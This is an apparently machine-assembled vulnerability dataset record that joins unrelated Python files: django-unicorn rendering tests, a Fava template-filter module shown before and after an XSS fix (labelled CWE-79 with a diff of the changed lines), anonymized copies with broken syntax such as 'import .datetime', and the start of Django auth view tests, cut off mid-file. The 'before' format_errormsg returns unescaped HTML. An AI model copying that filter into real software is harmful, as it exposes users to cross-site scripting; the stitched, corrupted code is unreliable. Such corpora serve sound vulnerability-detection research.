assert '"calls":[{"fn":"testCall","args":[]}]' in VAR_12
def FUNC_13(VAR_0):
settings.DEBUG = True
VAR_6 = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentCalls2'",
)
VAR_7 = unicorn(None, VAR_6)
VAR_8 = {}
VAR_12 = VAR_7.render(VAR_8)
assert '<script type="module"' in VAR_12
assert len(re.findall('<script type="module"', VAR_12)) == 1
assert '"calls":[{"fn":"testCall2","args":["hello"]}]' in VAR_12
def FUNC_14(VAR_0):
settings.DEBUG = True
VAR_6 = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentParent'",
)
VAR_7 = unicorn(None, VAR_6)
VAR_8 = {}
VAR_12 = VAR_7.render(VAR_8)
assert '<script type="module"' in VAR_12
assert len(re.findall('<script type="module"', VAR_12)) == 1
assert '"calls":[]' in VAR_12
def FUNC_15(VAR_0):
settings.DEBUG = True
VAR_6 = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentParent'",
)
VAR_7 = unicorn(None, VAR_6)
VAR_8 = {}
VAR_12 = VAR_7.render(VAR_8)
assert '<script type="module"' in VAR_12
assert len(re.findall('<script type="module"', VAR_12)) == 1
assert '"hash":"' in VAR_12
VAR_13 = VAR_12.index("<script")
VAR_14 = VAR_12[:VAR_13]
VAR_15 = generate_checksum(VAR_14)
assert f'"hash":"{VAR_15}"' in VAR_12
| import re
from django.template.base import Token, TokenType
import pytest
from django_unicorn.components import UnicornView
from django_unicorn.templatetags.unicorn import unicorn
from django_unicorn.utils import generate_checksum
from example.coffee.models import Flavor
class CLASS_0(UnicornView):
VAR_1 = "templates/test_component_parent.html"
class CLASS_1(UnicornView):
VAR_1 = "templates/test_component_kwargs.html"
VAR_2 = "world"
def __init__(self, *VAR_3, **VAR_4):
super().__init__(**VAR_4)
self.hello = VAR_4.get("test_kwarg")
class CLASS_2(UnicornView):
VAR_1 = "templates/test_component_kwargs_with_html_entity.html"
VAR_2 = "world"
def __init__(self, *VAR_3, **VAR_4):
super().__init__(**VAR_4)
self.hello = VAR_4.get("test_kwarg")
class CLASS_3(UnicornView):
VAR_1 = "templates/test_component_model.html"
VAR_5 = None
def __init__(self, *VAR_3, **VAR_4):
super().__init__(**VAR_4)
self.model_id = VAR_4.get("model_id")
class CLASS_4(UnicornView):
VAR_1 = "templates/test_component_parent.html"
def FUNC_17(self):
self.call("testCall")
class CLASS_5(UnicornView):
VAR_1 = "templates/test_component_parent.html"
def FUNC_17(self):
self.call("testCall2", "hello")
def FUNC_0():
VAR_6 = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs' test_kwarg='tested!'",
)
VAR_7 = unicorn(None, VAR_6)
VAR_8 = {}
VAR_9 = VAR_7.render(VAR_8)
assert "<b>tested!</b>" in VAR_9
def FUNC_1():
VAR_6 = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs' test_kwarg=test_var.nested",
)
VAR_7 = unicorn(None, VAR_6)
VAR_8 = {"test_var": {"nested": "variable!"}}
VAR_9 = VAR_7.render(VAR_8)
assert "<b>variable!</b>" in VAR_9
def FUNC_2():
VAR_6 = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargsWithHtmlEntity' test_kwarg=test_var.nested",
)
VAR_7 = unicorn(None, VAR_6)
VAR_8 = {"test_var": {"nested": "variable!"}}
VAR_9 = VAR_7.render(VAR_8)
assert "->variable!<-" in VAR_9
def FUNC_3(VAR_0):
settings.DEBUG = True
VAR_6 = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs' parent=view",
)
VAR_7 = unicorn(None, VAR_6)
VAR_10 = CLASS_0(component_name="test", component_id="asdf")
VAR_8 = {"view": VAR_10}
VAR_7.render(VAR_8)
assert VAR_7.parent
assert (
VAR_7.component_id
== "asdf:tests.templatetags.test_unicorn_render.FakeComponentKwargs"
)
def FUNC_4(VAR_0):
settings.DEBUG = True
VAR_6 = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs' parent=VAR_10 key='blob'",
)
VAR_7 = unicorn(None, VAR_6)
VAR_10 = CLASS_0(component_name="test", component_id="asdf")
VAR_8 = {"view": VAR_10}
VAR_7.render(VAR_8)
assert (
VAR_7.component_id
== "asdf:tests.templatetags.test_unicorn_render.FakeComponentKwargs:blob"
)
def FUNC_5(VAR_0):
settings.DEBUG = True
VAR_6 = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs' parent=VAR_10 id='flob'",
)
VAR_7 = unicorn(None, VAR_6)
VAR_10 = CLASS_0(component_name="test", component_id="asdf")
VAR_8 = {"view": VAR_10}
VAR_7.render(VAR_8)
assert (
VAR_7.component_id
== "asdf:tests.templatetags.test_unicorn_render.FakeComponentKwargs:flob"
)
def FUNC_6(VAR_0):
settings.DEBUG = True
VAR_6 = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs' parent=VAR_10 pk=99",
)
VAR_7 = unicorn(None, VAR_6)
VAR_10 = CLASS_0(component_name="test", component_id="asdf")
VAR_8 = {"view": VAR_10}
VAR_7.render(VAR_8)
assert (
VAR_7.component_id
== "asdf:tests.templatetags.test_unicorn_render.FakeComponentKwargs:99"
)
def FUNC_7(VAR_0):
settings.DEBUG = True
VAR_6 = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs' parent=VAR_10 model=model",
)
VAR_7 = unicorn(None, VAR_6)
VAR_10 = CLASS_0(component_name="test", component_id="asdf")
class CLASS_6:
def __init__(self):
self.id = 178
def FUNC_18(self):
return {"id": self.id}
VAR_8 = {"view": VAR_10, "model": CLASS_6()}
VAR_7.render(VAR_8)
assert (
VAR_7.component_id
== "asdf:tests.templatetags.test_unicorn_render.FakeComponentKwargs:178"
)
@pytest.mark.django_db
def FUNC_8(VAR_0):
settings.DEBUG = True
VAR_6 = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs' parent=VAR_10 model=model",
)
VAR_7 = unicorn(None, VAR_6)
VAR_10 = CLASS_0(component_name="test", component_id="asdf")
VAR_11 = Flavor(pk=187)
VAR_8 = {"view": VAR_10, "model": VAR_11}
VAR_7.render(VAR_8)
assert (
VAR_7.component_id
== "asdf:tests.templatetags.test_unicorn_render.FakeComponentKwargs:187"
)
def FUNC_9():
VAR_6 = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentModel' VAR_5=model.id",
)
VAR_7 = unicorn(None, VAR_6)
VAR_8 = {"model": {"pk": 123}}
VAR_9 = VAR_7.render(VAR_8)
assert "==123==" in VAR_9
def FUNC_10(VAR_0):
settings.DEBUG = True
VAR_6 = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs'",
)
VAR_7 = unicorn(None, VAR_6)
VAR_8 = {}
VAR_12 = VAR_7.render(VAR_8)
assert '<script type="module"' in VAR_12
assert len(re.findall('<script type="module"', VAR_12)) == 1
def FUNC_11(VAR_0):
settings.DEBUG = True
VAR_6 = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs' parent=view",
)
VAR_7 = unicorn(None, VAR_6)
VAR_10 = CLASS_0(component_name="test", component_id="asdf")
VAR_8 = {"view": VAR_10}
VAR_12 = VAR_7.render(VAR_8)
assert "<script" not in VAR_12
def FUNC_12(VAR_0):
settings.DEBUG = True
VAR_6 = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentParent'",
)
VAR_7 = unicorn(None, VAR_6)
VAR_8 = {}
VAR_12 = VAR_7.render(VAR_8)
assert '<script type="module"' in VAR_12
assert len(re.findall('<script type="module"', VAR_12)) == 1
def FUNC_13(VAR_0):
settings.DEBUG = True
VAR_6 = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentCalls'",
)
VAR_7 = unicorn(None, VAR_6)
VAR_8 = {}
VAR_12 = VAR_7.render(VAR_8)
assert '<script type="module"' in VAR_12
assert len(re.findall('<script type="module"', VAR_12)) == 1
assert '"calls":[{"fn":"testCall","args":[]}]' in VAR_12
def FUNC_14(VAR_0):
settings.DEBUG = True
VAR_6 = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentCalls2'",
)
VAR_7 = unicorn(None, VAR_6)
VAR_8 = {}
VAR_12 = VAR_7.render(VAR_8)
assert '<script type="module"' in VAR_12
assert len(re.findall('<script type="module"', VAR_12)) == 1
assert '"calls":[{"fn":"testCall2","args":["hello"]}]' in VAR_12
def FUNC_15(VAR_0):
settings.DEBUG = True
VAR_6 = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentParent'",
)
VAR_7 = unicorn(None, VAR_6)
VAR_8 = {}
VAR_12 = VAR_7.render(VAR_8)
assert '<script type="module"' in VAR_12
assert len(re.findall('<script type="module"', VAR_12)) == 1
assert '"calls":[]' in VAR_12
def FUNC_16(VAR_0):
settings.DEBUG = True
VAR_6 = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentParent'",
)
VAR_7 = unicorn(None, VAR_6)
VAR_8 = {}
VAR_12 = VAR_7.render(VAR_8)
assert '<script type="module"' in VAR_12
assert len(re.findall('<script type="module"', VAR_12)) == 1
assert '"hash":"' in VAR_12
VAR_13 = VAR_12.index("<script")
VAR_14 = VAR_12[:VAR_13]
VAR_15 = generate_checksum(VAR_14)
assert f'"hash":"{VAR_15}"' in VAR_12
| [
2,
4,
6,
11,
12,
15,
16,
20,
24,
25,
29,
33,
34,
37,
40,
41,
44,
47,
48,
57,
59,
60,
69,
71,
72,
83,
89,
90,
101,
106,
107,
118,
123,
124,
135,
140,
141,
150,
151,
155,
158,
161,
166,
167,
177,
181,
186,
187,
196,
198,
199,
209,
212,
213,
224,
226,
227,
237,
240,
241,
251,
255,
256,
266,
270,
271,
281,
285,
286,
296,
300,
301,
306
] | [
2,
4,
6,
11,
12,
15,
16,
20,
24,
25,
29,
33,
34,
38,
42,
43,
46,
49,
50,
53,
56,
57,
66,
68,
69,
78,
80,
81,
90,
92,
93,
104,
110,
111,
122,
127,
128,
139,
144,
145,
156,
161,
162,
171,
172,
176,
179,
182,
187,
188,
198,
202,
207,
208,
217,
219,
220,
230,
233,
234,
245,
247,
248,
258,
261,
262,
272,
276,
277,
287,
291,
292,
302,
306,
307,
317,
321,
322,
327
] |
1CWE-79
| """Template filters for Fava.
All functions in this module will be automatically added as template filters.
"""
from __future__ import annotations
import datetime
import os
import re
import unicodedata
from typing import Any
from typing import MutableMapping
from typing import TypeVar
import flask
from beancount.core import compare
from beancount.core import realization
from beancount.core.account import ACCOUNT_RE
from beancount.core.data import Directive
from beancount.core.inventory import Inventory
from beancount.core.number import Decimal
from beancount.core.number import ZERO
from fava.context import g
from fava.core.conversion import cost
from fava.core.conversion import cost_or_value as cost_or_value_without_context
from fava.core.conversion import units
from fava.core.tree import TreeNode
from fava.util.date import Interval
MappingValue = TypeVar("MappingValue")
def remove_keys(
_dict: MutableMapping[str, MappingValue] | None, keys: list[str]
) -> MutableMapping[str, MappingValue]:
"""Remove keys from a dictionary."""
if not _dict:
return {}
new = dict(_dict)
for key in keys:
try:
del new[key]
except KeyError:
pass
return new
def cost_or_value(
inventory: Inventory, date: datetime.date | None = None
) -> Any:
"""Get the cost or value of an inventory."""
return cost_or_value_without_context(
inventory, g.conversion, g.ledger.price_map, date
)
def format_currency(
value: Decimal,
currency: str | None = None,
show_if_zero: bool = False,
invert: bool = False,
) -> str:
"""Format a value using the derived precision for a specified currency."""
if not value and not show_if_zero:
return ""
if value == ZERO:
return g.ledger.format_decimal(ZERO, currency)
if invert:
value = -value
return g.ledger.format_decimal(value, currency)
def format_date(date: datetime.date) -> str:
"""Format a date according to the current interval."""
if g.interval is Interval.YEAR:
return date.strftime("%Y")
if g.interval is Interval.QUARTER:
return f"{date.year}Q{(date.month - 1) // 3 + 1}"
if g.interval is Interval.WEEK:
return date.strftime("%YW%W")
if g.interval is Interval.DAY:
return date.strftime("%Y-%m-%d")
assert g.interval is Interval.MONTH
return date.strftime("%b %Y")
def hash_entry(entry: Directive) -> str:
"""Hash an entry."""
return compare.hash_entry(entry)
def balance_children(account: realization.RealAccount) -> Inventory:
"""Compute the total balance of an account."""
return realization.compute_balance(account)
def get_or_create(
account: realization.RealAccount, account_name: str
) -> realization.RealAccount:
"""Get or create a child account."""
if account.account == account_name:
return account
return realization.get_or_create(account, account_name)
FLAGS_TO_TYPES = {"*": "cleared", "!": "pending"}
def flag_to_type(flag: str) -> str:
"""Names for entry flags."""
return FLAGS_TO_TYPES.get(flag, "other")
def should_show(account: TreeNode) -> bool:
"""Determine whether the account should be shown."""
if not account.balance_children.is_empty() or any(
should_show(a) for a in account.children
):
return True
ledger = g.ledger
filtered = g.filtered
if account.name not in ledger.accounts:
return False
fava_options = ledger.fava_options
if not fava_options.show_closed_accounts and filtered.account_is_closed(
account.name
):
return False
if (
not fava_options.show_accounts_with_zero_balance
and account.balance.is_empty()
):
return False
if (
not fava_options.show_accounts_with_zero_transactions
and not account.has_txns
):
return False
return True
def basename(file_path: str) -> str:
"""Return the basename of a filepath."""
return unicodedata.normalize("NFC", os.path.basename(file_path))
def format_errormsg(message: str) -> str:
"""Match account names in error messages and insert HTML links for them."""
match = re.search(ACCOUNT_RE, message)
if not match:
return message
account = match.group()
url = flask.url_for("account", name=account)
return (
message.replace(account, f'<a href="{url}">{account}</a>')
.replace("for '", "for ")
.replace("': ", ": ")
)
def collapse_account(account_name: str) -> bool:
"""Return true if account should be collapsed."""
collapse_patterns = g.ledger.fava_options.collapse_pattern
return any(pattern.match(account_name) for pattern in collapse_patterns)
FILTERS = [
balance_children,
basename,
collapse_account,
cost,
cost_or_value,
cost_or_value,
flag_to_type,
format_currency,
format_date,
format_errormsg,
get_or_create,
hash_entry,
remove_keys,
should_show,
units,
]
| """Template filters for Fava.
All functions in this module will be automatically added as template filters.
"""
from __future__ import annotations
import datetime
import os
import re
import unicodedata
from typing import Any
from typing import MutableMapping
from typing import TypeVar
from beancount.core import compare
from beancount.core import realization
from beancount.core.account import ACCOUNT_RE
from beancount.core.data import Directive
from beancount.core.inventory import Inventory
from beancount.core.number import Decimal
from beancount.core.number import ZERO
from flask import url_for
from markupsafe import Markup
from fava.context import g
from fava.core.conversion import cost
from fava.core.conversion import cost_or_value as cost_or_value_without_context
from fava.core.conversion import units
from fava.core.tree import TreeNode
from fava.util.date import Interval
MappingValue = TypeVar("MappingValue")
def remove_keys(
_dict: MutableMapping[str, MappingValue] | None, keys: list[str]
) -> MutableMapping[str, MappingValue]:
"""Remove keys from a dictionary."""
if not _dict:
return {}
new = dict(_dict)
for key in keys:
try:
del new[key]
except KeyError:
pass
return new
def cost_or_value(
inventory: Inventory, date: datetime.date | None = None
) -> Any:
"""Get the cost or value of an inventory."""
return cost_or_value_without_context(
inventory, g.conversion, g.ledger.price_map, date
)
def format_currency(
value: Decimal,
currency: str | None = None,
show_if_zero: bool = False,
invert: bool = False,
) -> str:
"""Format a value using the derived precision for a specified currency."""
if not value and not show_if_zero:
return ""
if value == ZERO:
return g.ledger.format_decimal(ZERO, currency)
if invert:
value = -value
return g.ledger.format_decimal(value, currency)
def format_date(date: datetime.date) -> str:
"""Format a date according to the current interval."""
if g.interval is Interval.YEAR:
return date.strftime("%Y")
if g.interval is Interval.QUARTER:
return f"{date.year}Q{(date.month - 1) // 3 + 1}"
if g.interval is Interval.WEEK:
return date.strftime("%YW%W")
if g.interval is Interval.DAY:
return date.strftime("%Y-%m-%d")
assert g.interval is Interval.MONTH
return date.strftime("%b %Y")
def hash_entry(entry: Directive) -> str:
"""Hash an entry."""
return compare.hash_entry(entry)
def balance_children(account: realization.RealAccount) -> Inventory:
"""Compute the total balance of an account."""
return realization.compute_balance(account)
def get_or_create(
account: realization.RealAccount, account_name: str
) -> realization.RealAccount:
"""Get or create a child account."""
if account.account == account_name:
return account
return realization.get_or_create(account, account_name)
FLAGS_TO_TYPES = {"*": "cleared", "!": "pending"}
def flag_to_type(flag: str) -> str:
"""Names for entry flags."""
return FLAGS_TO_TYPES.get(flag, "other")
def should_show(account: TreeNode) -> bool:
"""Determine whether the account should be shown."""
if not account.balance_children.is_empty() or any(
should_show(a) for a in account.children
):
return True
ledger = g.ledger
filtered = g.filtered
if account.name not in ledger.accounts:
return False
fava_options = ledger.fava_options
if not fava_options.show_closed_accounts and filtered.account_is_closed(
account.name
):
return False
if (
not fava_options.show_accounts_with_zero_balance
and account.balance.is_empty()
):
return False
if (
not fava_options.show_accounts_with_zero_transactions
and not account.has_txns
):
return False
return True
def basename(file_path: str) -> str:
"""Return the basename of a filepath."""
return unicodedata.normalize("NFC", os.path.basename(file_path))
def format_errormsg(message: str) -> Markup:
"""Match account names in error messages and insert HTML links for them."""
match = re.search(ACCOUNT_RE, message)
if not match:
return Markup(message)
account = match.group()
url = url_for("account", name=account)
return Markup(
message.replace(account, f'<a href="{url}">{account}</a>')
.replace("for '", "for ")
.replace("': ", ": ")
)
def collapse_account(account_name: str) -> bool:
"""Return true if account should be collapsed."""
collapse_patterns = g.ledger.fava_options.collapse_pattern
return any(pattern.match(account_name) for pattern in collapse_patterns)
FILTERS = [
balance_children,
basename,
collapse_account,
cost,
cost_or_value,
cost_or_value,
flag_to_type,
format_currency,
format_date,
format_errormsg,
get_or_create,
hash_entry,
remove_keys,
should_show,
units,
]
| xss | {
"code": [
"import flask",
"def format_errormsg(message: str) -> str:",
" return message",
" url = flask.url_for(\"account\", name=account)",
" return ("
],
"line_no": [
15,
148,
152,
154,
155
]
} | {
"code": [
"from flask import url_for",
"def format_errormsg(message: str) -> Markup:",
" return Markup(message)",
" url = url_for(\"account\", name=account)",
" return Markup("
],
"line_no": [
22,
149,
153,
155,
156
]
} |
from __future__ import annotations
import .datetime
import os
import re
import unicodedata
from typing import Any
from typing import MutableMapping
from typing import TypeVar
import flask
from beancount.core import compare
from beancount.core import realization
from beancount.core.account import ACCOUNT_RE
from beancount.core.data import Directive
from beancount.core.inventory import Inventory
from beancount.core.number import Decimal
from beancount.core.number import ZERO
from fava.context import g
from fava.core.conversion import cost
from fava.core.conversion import .cost_or_value as cost_or_value_without_context
from fava.core.conversion import units
from fava.core.tree import TreeNode
from fava.util.date import Interval
VAR_0 = TypeVar("MappingValue")
def FUNC_0(
VAR_1: MutableMapping[str, VAR_0] | None, VAR_2: list[str]
) -> MutableMapping[str, VAR_0]:
if not VAR_1:
return {}
VAR_17 = dict(VAR_1)
for key in VAR_2:
try:
del VAR_17[key]
except KeyError:
pass
return VAR_17
def FUNC_1(
VAR_3: Inventory, VAR_4: datetime.date | None = None
) -> Any:
return cost_or_value_without_context(
VAR_3, g.conversion, g.ledger.price_map, VAR_4
)
def FUNC_2(
VAR_5: Decimal,
VAR_6: str | None = None,
VAR_7: bool = False,
VAR_8: bool = False,
) -> str:
if not VAR_5 and not VAR_7:
return ""
if VAR_5 == ZERO:
return g.ledger.format_decimal(ZERO, VAR_6)
if VAR_8:
VAR_5 = -value
return g.ledger.format_decimal(VAR_5, VAR_6)
def FUNC_3(VAR_4: datetime.date) -> str:
if g.interval is Interval.YEAR:
return VAR_4.strftime("%Y")
if g.interval is Interval.QUARTER:
return f"{VAR_4.year}Q{(VAR_4.month - 1) // 3 + 1}"
if g.interval is Interval.WEEK:
return VAR_4.strftime("%YW%W")
if g.interval is Interval.DAY:
return VAR_4.strftime("%Y-%m-%d")
assert g.interval is Interval.MONTH
return VAR_4.strftime("%b %Y")
def FUNC_4(VAR_9: Directive) -> str:
return compare.hash_entry(VAR_9)
def FUNC_5(VAR_10: realization.RealAccount) -> Inventory:
return realization.compute_balance(VAR_10)
def FUNC_6(
VAR_10: realization.RealAccount, VAR_11: str
) -> realization.RealAccount:
if VAR_10.account == VAR_11:
return VAR_10
return realization.get_or_create(VAR_10, VAR_11)
VAR_12 = {"*": "cleared", "!": "pending"}
def FUNC_7(VAR_13: str) -> str:
return VAR_12.get(VAR_13, "other")
def FUNC_8(VAR_10: TreeNode) -> bool:
if not VAR_10.balance_children.is_empty() or any(
FUNC_8(a) for a in VAR_10.children
):
return True
VAR_18 = g.ledger
VAR_19 = g.filtered
if VAR_10.name not in VAR_18.accounts:
return False
VAR_20 = VAR_18.fava_options
if not VAR_20.show_closed_accounts and VAR_19.account_is_closed(
VAR_10.name
):
return False
if (
not VAR_20.show_accounts_with_zero_balance
and VAR_10.balance.is_empty()
):
return False
if (
not VAR_20.show_accounts_with_zero_transactions
and not VAR_10.has_txns
):
return False
return True
def FUNC_9(VAR_14: str) -> str:
return unicodedata.normalize("NFC", os.path.basename(VAR_14))
def FUNC_10(VAR_15: str) -> str:
VAR_21 = re.search(ACCOUNT_RE, VAR_15)
if not VAR_21:
return VAR_15
VAR_10 = VAR_21.group()
VAR_22 = flask.url_for("account", name=VAR_10)
return (
VAR_15.replace(VAR_10, f'<a href="{VAR_22}">{VAR_10}</a>')
.replace("for '", "for ")
.replace("': ", ": ")
)
def FUNC_11(VAR_11: str) -> bool:
VAR_23 = g.ledger.fava_options.collapse_pattern
return any(pattern.match(VAR_11) for pattern in VAR_23)
VAR_16 = [
FUNC_5,
FUNC_9,
FUNC_11,
cost,
FUNC_1,
cost_or_value,
FUNC_7,
FUNC_2,
FUNC_3,
FUNC_10,
FUNC_6,
FUNC_4,
FUNC_0,
FUNC_8,
units,
]
|
from __future__ import annotations
import .datetime
import os
import re
import unicodedata
from typing import Any
from typing import MutableMapping
from typing import TypeVar
from beancount.core import compare
from beancount.core import realization
from beancount.core.account import ACCOUNT_RE
from beancount.core.data import Directive
from beancount.core.inventory import Inventory
from beancount.core.number import Decimal
from beancount.core.number import ZERO
from flask import .url_for
from markupsafe import Markup
from fava.context import g
from fava.core.conversion import cost
from fava.core.conversion import .cost_or_value as cost_or_value_without_context
from fava.core.conversion import units
from fava.core.tree import TreeNode
from fava.util.date import Interval
VAR_0 = TypeVar("MappingValue")
def FUNC_0(
VAR_1: MutableMapping[str, VAR_0] | None, VAR_2: list[str]
) -> MutableMapping[str, VAR_0]:
if not VAR_1:
return {}
VAR_17 = dict(VAR_1)
for key in VAR_2:
try:
del VAR_17[key]
except KeyError:
pass
return VAR_17
def FUNC_1(
VAR_3: Inventory, VAR_4: datetime.date | None = None
) -> Any:
return cost_or_value_without_context(
VAR_3, g.conversion, g.ledger.price_map, VAR_4
)
def FUNC_2(
VAR_5: Decimal,
VAR_6: str | None = None,
VAR_7: bool = False,
VAR_8: bool = False,
) -> str:
if not VAR_5 and not VAR_7:
return ""
if VAR_5 == ZERO:
return g.ledger.format_decimal(ZERO, VAR_6)
if VAR_8:
VAR_5 = -value
return g.ledger.format_decimal(VAR_5, VAR_6)
def FUNC_3(VAR_4: datetime.date) -> str:
if g.interval is Interval.YEAR:
return VAR_4.strftime("%Y")
if g.interval is Interval.QUARTER:
return f"{VAR_4.year}Q{(VAR_4.month - 1) // 3 + 1}"
if g.interval is Interval.WEEK:
return VAR_4.strftime("%YW%W")
if g.interval is Interval.DAY:
return VAR_4.strftime("%Y-%m-%d")
assert g.interval is Interval.MONTH
return VAR_4.strftime("%b %Y")
def FUNC_4(VAR_9: Directive) -> str:
return compare.hash_entry(VAR_9)
def FUNC_5(VAR_10: realization.RealAccount) -> Inventory:
return realization.compute_balance(VAR_10)
def FUNC_6(
VAR_10: realization.RealAccount, VAR_11: str
) -> realization.RealAccount:
if VAR_10.account == VAR_11:
return VAR_10
return realization.get_or_create(VAR_10, VAR_11)
VAR_12 = {"*": "cleared", "!": "pending"}
def FUNC_7(VAR_13: str) -> str:
return VAR_12.get(VAR_13, "other")
def FUNC_8(VAR_10: TreeNode) -> bool:
if not VAR_10.balance_children.is_empty() or any(
FUNC_8(a) for a in VAR_10.children
):
return True
VAR_18 = g.ledger
VAR_19 = g.filtered
if VAR_10.name not in VAR_18.accounts:
return False
VAR_20 = VAR_18.fava_options
if not VAR_20.show_closed_accounts and VAR_19.account_is_closed(
VAR_10.name
):
return False
if (
not VAR_20.show_accounts_with_zero_balance
and VAR_10.balance.is_empty()
):
return False
if (
not VAR_20.show_accounts_with_zero_transactions
and not VAR_10.has_txns
):
return False
return True
def FUNC_9(VAR_14: str) -> str:
return unicodedata.normalize("NFC", os.path.basename(VAR_14))
def FUNC_10(VAR_15: str) -> Markup:
VAR_21 = re.search(ACCOUNT_RE, VAR_15)
if not VAR_21:
return Markup(VAR_15)
VAR_10 = VAR_21.group()
VAR_22 = url_for("account", name=VAR_10)
return Markup(
VAR_15.replace(VAR_10, f'<a href="{VAR_22}">{VAR_10}</a>')
.replace("for '", "for ")
.replace("': ", ": ")
)
def FUNC_11(VAR_11: str) -> bool:
VAR_23 = g.ledger.fava_options.collapse_pattern
return any(pattern.match(VAR_11) for pattern in VAR_23)
VAR_16 = [
FUNC_5,
FUNC_9,
FUNC_11,
cost,
FUNC_1,
cost_or_value,
FUNC_7,
FUNC_2,
FUNC_3,
FUNC_10,
FUNC_6,
FUNC_4,
FUNC_0,
FUNC_8,
units,
]
| [
2,
6,
14,
23,
30,
32,
33,
47,
48,
56,
57,
72,
73,
86,
87,
91,
92,
96,
97,
105,
106,
108,
109,
113,
114,
141,
142,
146,
147,
160,
161,
166,
167,
185,
1,
2,
3,
4,
37,
52,
64,
75,
89,
94,
101,
111,
116,
144,
149,
163
] | [
2,
6,
14,
24,
31,
33,
34,
48,
49,
57,
58,
73,
74,
87,
88,
92,
93,
97,
98,
106,
107,
109,
110,
114,
115,
142,
143,
147,
148,
161,
162,
167,
168,
186,
1,
2,
3,
4,
38,
53,
65,
76,
90,
95,
102,
112,
117,
145,
150,
164
] |
1CWE-79
| import itertools
import os
import re
try:
from urllib.parse import urlparse, ParseResult
except ImportError: # Python 2
from urlparse import urlparse, ParseResult
from django.conf import global_settings, settings
from django.contrib.sites.models import Site, RequestSite
from django.contrib.admin.models import LogEntry
from django.contrib.auth.models import User
from django.core import mail
from django.core.urlresolvers import reverse, NoReverseMatch
from django.http import QueryDict, HttpRequest
from django.utils.encoding import force_text
from django.utils.http import urlquote
from django.utils._os import upath
from django.test import TestCase
from django.test.utils import override_settings, patch_logger
from django.middleware.csrf import CsrfViewMiddleware
from django.contrib.sessions.middleware import SessionMiddleware
from django.contrib.auth import SESSION_KEY, REDIRECT_FIELD_NAME
from django.contrib.auth.forms import (AuthenticationForm, PasswordChangeForm,
SetPasswordForm)
from django.contrib.auth.tests.utils import skipIfCustomUser
from django.contrib.auth.views import login as login_view
@override_settings(
LANGUAGES=(
('en', 'English'),
),
LANGUAGE_CODE='en',
TEMPLATE_LOADERS=global_settings.TEMPLATE_LOADERS,
TEMPLATE_DIRS=(
os.path.join(os.path.dirname(upath(__file__)), 'templates'),
),
USE_TZ=False,
PASSWORD_HASHERS=('django.contrib.auth.hashers.SHA1PasswordHasher',),
)
class AuthViewsTestCase(TestCase):
"""
Helper base class for all the follow test cases.
"""
fixtures = ['authtestdata.json']
urls = 'django.contrib.auth.tests.urls'
def login(self, password='password'):
response = self.client.post('/login/', {
'username': 'testclient',
'password': password,
})
self.assertTrue(SESSION_KEY in self.client.session)
return response
def logout(self):
response = self.client.get('/admin/logout/')
self.assertEqual(response.status_code, 200)
self.assertTrue(SESSION_KEY not in self.client.session)
def assertFormError(self, response, error):
"""Assert that error is found in response.context['form'] errors"""
form_errors = list(itertools.chain(*response.context['form'].errors.values()))
self.assertIn(force_text(error), form_errors)
def assertURLEqual(self, url, expected, parse_qs=False):
"""
Given two URLs, make sure all their components (the ones given by
urlparse) are equal, only comparing components that are present in both
URLs.
If `parse_qs` is True, then the querystrings are parsed with QueryDict.
This is useful if you don't want the order of parameters to matter.
Otherwise, the query strings are compared as-is.
"""
fields = ParseResult._fields
for attr, x, y in zip(fields, urlparse(url), urlparse(expected)):
if parse_qs and attr == 'query':
x, y = QueryDict(x), QueryDict(y)
if x and y and x != y:
self.fail("%r != %r (%s doesn't match)" % (url, expected, attr))
@skipIfCustomUser
class AuthViewNamedURLTests(AuthViewsTestCase):
urls = 'django.contrib.auth.urls'
def test_named_urls(self):
"Named URLs should be reversible"
expected_named_urls = [
('login', [], {}),
('logout', [], {}),
('password_change', [], {}),
('password_change_done', [], {}),
('password_reset', [], {}),
('password_reset_done', [], {}),
('password_reset_confirm', [], {
'uidb64': 'aaaaaaa',
'token': '1111-aaaaa',
}),
('password_reset_complete', [], {}),
]
for name, args, kwargs in expected_named_urls:
try:
reverse(name, args=args, kwargs=kwargs)
except NoReverseMatch:
self.fail("Reversal of url named '%s' failed with NoReverseMatch" % name)
@skipIfCustomUser
class PasswordResetTest(AuthViewsTestCase):
def test_email_not_found(self):
"""If the provided email is not registered, don't raise any error but
also don't send any email."""
response = self.client.get('/password_reset/')
self.assertEqual(response.status_code, 200)
response = self.client.post('/password_reset/', {'email': 'not_a_real_email@email.com'})
self.assertEqual(response.status_code, 302)
self.assertEqual(len(mail.outbox), 0)
def test_email_found(self):
"Email is sent if a valid email address is provided for password reset"
response = self.client.post('/password_reset/', {'email': 'staffmember@example.com'})
self.assertEqual(response.status_code, 302)
self.assertEqual(len(mail.outbox), 1)
self.assertTrue("http://" in mail.outbox[0].body)
self.assertEqual(settings.DEFAULT_FROM_EMAIL, mail.outbox[0].from_email)
# optional multipart text/html email has been added. Make sure original,
# default functionality is 100% the same
